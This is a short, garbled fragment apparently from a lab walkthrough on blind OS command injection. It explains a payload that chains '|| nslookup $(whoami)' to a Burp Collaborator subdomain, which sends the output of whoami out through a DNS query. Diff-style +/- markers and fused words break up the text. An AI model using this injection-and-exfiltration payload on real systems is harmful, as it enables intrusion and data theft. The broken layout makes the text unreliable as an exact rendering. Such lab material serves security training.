Blind OS command injection with out-of-band data exfiltration

 ||

-: Delimiters to separate commands.
+: Delimiters to separate commands.nslookup

-: Executes a DNS lookup.
+: Executes a DNS lookup.$(whoami)

-: Executes the whoami
+: Executes thewhoami

-command and appends the output to the DNS query.
+command and appends the output to the DNS query.BURP-COLLABORATOR-SUBDOMAIN

 : Your unique Collaborator server address.